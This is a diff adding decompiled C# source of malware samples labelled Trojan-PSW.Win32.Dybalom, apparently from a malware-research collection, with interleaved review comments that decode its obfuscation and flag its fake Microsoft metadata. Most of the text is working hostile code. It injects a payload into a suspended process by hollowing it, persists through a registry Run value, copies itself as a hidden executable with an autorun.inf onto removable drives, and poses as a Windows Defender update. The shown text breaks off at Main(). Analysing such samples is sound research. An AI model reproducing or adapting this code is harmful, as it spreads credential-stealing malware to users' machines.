StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BAF1FDD5-92B6-4629-8E69-C75120560E7D}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>46-dcrio</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "46-dcrio", "Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.csproj", "{BAF1FDD5-92B6-4629-8E69-C75120560E7D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BAF1FDD5-92B6-4629-8E69-C75120560E7D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,6 @@
using System.Reflection;
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDescription("Windows Defender Update")]
[assembly: AssemblyCopyright("Microsoft Corporation")]
[assembly: AssemblyVersion("1.3.2.4")]
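Review bot: These attributes claim `Microsoft Corporation` and `Windows Defender Update`, and nothing in the file marks them as values supplied by the sample itself. The decompiler headers of the files that follow give the assembly as `windefender_upd-2, Version=1.3.2.4` with `PublicKeyToken=null`, so, assuming this AssemblyInfo belongs to that assembly, the vendor strings are not backed by a strong name. I would add `// Metadata as shipped by the sample: vendor strings imitate Microsoft; assembly is not strong-named (PublicKeyToken=null).` at the top so the strings are never read as provenance. For triage, a Microsoft company or description string on a binary that lacks a valid Microsoft signature is a useful masquerading check (MITRE ATT&CK T1036).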
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: FHQnUxOuBUcRwss
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Text;
public class FHQnUxOuBUcRwss
{
private string rqHLNFetlWEGbEI;
public string TzTZhWCLMKPmtBe
{
get => this.rqHLNFetlWEGbEI;
set => this.rqHLNFetlWEGbEI = value;
}
public FHQnUxOuBUcRwss(string TzTZhWCLMKPmtBe)
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = TzTZhWCLMKPmtBe;
}
public FHQnUxOuBUcRwss()
{
this.rqHLNFetlWEGbEI = "";
this.TzTZhWCLMKPmtBe = "";
}
public string DbqjTCEYBFTdyMy(string CNHZIfPZfbnETac) => Encoding.Default.GetString(this.DbqjTCEYBFTdyMy(Encoding.Default.GetBytes(CNHZIfPZfbnETac)));
public byte[] DbqjTCEYBFTdyMy(byte[] CNHZIfPZfbnETac)
{
CNHZIfPZfbnETac = this.cyXPLXnDYMVsnRT(CNHZIfPZfbnETac, Encoding.Default.GetBytes(this.TzTZhWCLMKPmtBe));
byte[] numArray = new byte[CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(10), 2) + 1];
object Counter;
object LoopForResult;
object CounterResult;
if (ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) (CNHZIfPZfbnETac.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) Convert.ToInt32(Conversions.ToString(1), 2), (object) -Convert.ToInt32(Conversions.ToString(1), 2), ref LoopForResult, ref CounterResult))
{
do
{
numArray[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))] = this.YyVUvduhlLlwqJG(CNHZIfPZfbnETac[Conversions.ToInteger(CounterResult)], (short) -CNHZIfPZfbnETac[Conversions.ToInteger(Operators.SubtractObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(1), 2)))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return numArray;
}
private byte YyVUvduhlLlwqJG(byte DKRhIIXNQIgKomU, short JdULYiSRFFfoBdw)
{
while ((int) JdULYiSRFFfoBdw < Convert.ToInt32(Conversions.ToString(0), 2))
JdULYiSRFFfoBdw += (short) Convert.ToInt32(Conversions.ToString(100000000), 2);
return Convert.ToByte((int) (short) ((int) DKRhIIXNQIgKomU + (int) JdULYiSRFFfoBdw) % Convert.ToInt32(Conversions.ToString(100000000), 2));
}
private byte[] cyXPLXnDYMVsnRT(byte[] DKRhIIXNQIgKomU, byte[] lJEhjQWpxnTOONS)
{
object Counter;
object LoopForResult;
object CounterResult;
if (lJEhjQWpxnTOONS.Length != 0 && ObjectFlowControl.ForLoopControl.ForLoopInitObj(Counter, (object) Convert.ToInt32(Conversions.ToString(0), 2), (object) (DKRhIIXNQIgKomU.Length - Convert.ToInt32(Conversions.ToString(1), 2)), (object) 1, ref LoopForResult, ref CounterResult))
{
do
{
DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] = (byte) ((int) DKRhIIXNQIgKomU[Conversions.ToInteger(CounterResult)] ^ (int) this.YyVUvduhlLlwqJG(lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))], (short) lJEhjQWpxnTOONS[(int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(CounterResult, (object) lJEhjQWpxnTOONS.Length))] % lJEhjQWpxnTOONS.Length]) ^ (int) lJEhjQWpxnTOONS[Conversions.ToInteger(Operators.ModObject(Operators.ModObject(Operators.AddObject(CounterResult, Operators.ModObject(CounterResult, (object) Convert.ToInt32(Conversions.ToString(111), 2))), (object) lJEhjQWpxnTOONS.Length), (object) lJEhjQWpxnTOONS.Length))]);
}
while (ObjectFlowControl.ForLoopControl.ForNextCheckObj(CounterResult, LoopForResult, ref CounterResult));
}
return DKRhIIXNQIgKomU;
}
public string cyXPLXnDYMVsnRT(string WSBPooPYkNgMjCb, string lJEhjQWpxnTOONS) => Encoding.Default.GetString(this.cyXPLXnDYMVsnRT(Encoding.Default.GetBytes(WSBPooPYkNgMjCb), Encoding.Default.GetBytes(lJEhjQWpxnTOONS)));
}
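Review bot: Every integer constant in this class is written as `Convert.ToInt32(Conversions.ToString(N), 2)`, which parses the decimal digits of N as a base-2 string, and nothing documents the real values: `0` and `1` are unchanged, `10` is 2, `111` is 7 and `100000000` is 256. With those substituted, `YyVUvduhlLlwqJG` is addition modulo 256, `cyXPLXnDYMVsnRT(byte[], byte[])` XORs the buffer in place with bytes derived from the key, and `DbqjTCEYBFTdyMy(byte[])` applies that XOR and then returns each byte minus its predecessor, one byte shorter than the input. A short header comment stating this, plus annotations such as `// = 256` beside the constants, would let an analyst decode whatever the sample passes through this class without running it. The `string` overloads round-trip through `Encoding.Default`, so an offline decode presumably has to use the same ANSI code page as the host the sample was built for. `Counter`, `LoopForResult` and `CounterResult` are passed before assignment, a decompiler artifact of the VB `For` helper, so the file does not compile as shown and that should be stated too.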
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: Ghost
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
internal class Ghost
{
private int Current;
public string[] StringExclusion;
public string[] NameExclusion;
public int Numbers;
public long Equations;
public Ghost()
{
this.StringExclusion = new string[0];
this.NameExclusion = new string[0];
}
private void Store(string data)
{
if (data.Length != 0)
;
}
public void Process() => this.Current = 0;
private void ProcessStrings()
{
}
private void ProcessNames()
{
}
private void ProcessNumbers() => this.Equations += 6L;
private void ProcessNumber(int value, string result)
{
}
}
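Review bot: `Ghost` is inert as decompiled and the file does not say so: `Store`, `ProcessStrings`, `ProcessNames` and `ProcessNumber` have empty bodies (the `if` in `Store` guards an empty statement), and `Process` and `ProcessNumbers` only write the object's own `Current` and `Equations` fields. I would add a class comment such as `// No effect outside this object in the decompiled output; possibly obfuscator residue or stripped code. Confirm there are no callers before excluding it from analysis.` That keeps reviewers from spending time here and also from dismissing the class without checking for callers.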
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : ApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: My.MyComputer
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
@@ -0,0 +1,113 @@
// Decompiled with JetBrains decompiler
// Type: My.MyProject
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[HideModuleName]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
internal new Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[ComVisible(false)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public ThreadSafeObjectProvider()
{
}
}
}
}
@@ -0,0 +1,49 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30C9438B-F02F-487B-9233-C4D46FE57FAC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>windefender_upd-2</AssemblyName>
<ApplicationVersion>1.3.2.4</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Ghost.cs" />
<Compile Include="FHQnUxOuBUcRwss.cs" />
<Compile Include="YUGFYLIGvlfiyl.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="H.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "windefender_upd-2", "Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.csproj", "{30C9438B-F02F-487B-9233-C4D46FE57FAC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,550 @@
// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
public class YUGFYLIGvlfiyl
{
private static string urPkJBxJaoKxHfa;
private static string DFlGLTJoxxwCYfm;
private static string RedtwzrQfYIqsNp;
private static string uIFnBaaCKWySxWn;
[DebuggerNonUserCode]
public YUGFYLIGvlfiyl()
{
}
public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
{
char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
int index1 = 0;
int num2 = JEhjQWpxnTOONSD.Length - 1;
for (int index2 = 0; index2 <= num2; ++index2)
{
if (index2 < JEhjQWpxnTOONSD.Length - 1)
{
if (index1 >= charArray2.Length)
index1 = 0;
int num3 = (int) charArray1[index2];
int num4 = (int) charArray2[index1];
int num5 = num3 - num1 - num4;
chArray[index2] = Convert.ToChar(num5);
++index1;
}
}
return new string(chArray);
}
public static void CiMbIOhpfLGHFKu()
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
while (true)
{
try
{
if (!System.IO.File.Exists(str))
{
System.IO.File.Copy(Application.ExecutablePath, str);
YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
}
public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);
public static object Spread(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
string location = Assembly.GetExecutingAssembly().Location;
label_3:
num3 = 3;
System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
label_4:
num3 = 4;
FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
label_5:
num3 = 5;
fileInfo.Attributes = FileAttributes.Hidden;
label_6:
obj1 = (object) null;
goto label_13;
label_8:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static object SetAutorun(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
label_3:
num3 = 3;
streamWriter.WriteLine("[AutoRun]");
label_4:
num3 = 4;
streamWriter.WriteLine("Open = erPCyQY.exe");
label_5:
num3 = 5;
streamWriter.Close();
label_6:
num3 = 6;
FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
label_7:
num3 = 7;
fileInfo.Attributes = FileAttributes.Hidden;
label_8:
obj1 = (object) null;
goto label_15;
label_10:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_8;
case 9:
goto label_15;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_10;
}
throw ProjectData.CreateProjectError(-2146828237);
label_15:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static void searchDrives()
{
label_1:
int num1;
int num2;
try
{
label_2:
ProjectData.ClearProjectError();
num1 = -2;
label_3:
int num3 = 3;
Thread.Sleep(1000);
label_4:
num3 = 4;
DriveInfo[] drives = DriveInfo.GetDrives();
label_5:
num3 = 5;
DriveInfo[] driveInfoArray = drives;
int index = 0;
goto label_16;
label_7:
num3 = 6;
DriveInfo driveInfo;
if (driveInfo.DriveType != DriveType.Removable)
goto label_14;
label_8:
num3 = 7;
if (!driveInfo.IsReady)
goto label_13;
label_9:
num3 = 8;
if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
goto label_12;
label_10:
num3 = 9;
YUGFYLIGvlfiyl.Spread(driveInfo.Name);
label_11:
num3 = 10;
YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
label_12:
label_13:
label_14:
++index;
label_15:
num3 = 14;
label_16:
if (index < driveInfoArray.Length)
{
driveInfo = driveInfoArray[index];
goto label_7;
}
else
goto label_2;
label_18:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
case 15:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_7;
case 7:
goto label_8;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
goto label_12;
case 12:
goto label_13;
case 13:
goto label_14;
case 14:
goto label_15;
case 16:
goto label_23;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_18;
}
throw ProjectData.CreateProjectError(-2146828237);
label_23:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[STAThread]
public static void Main()
{
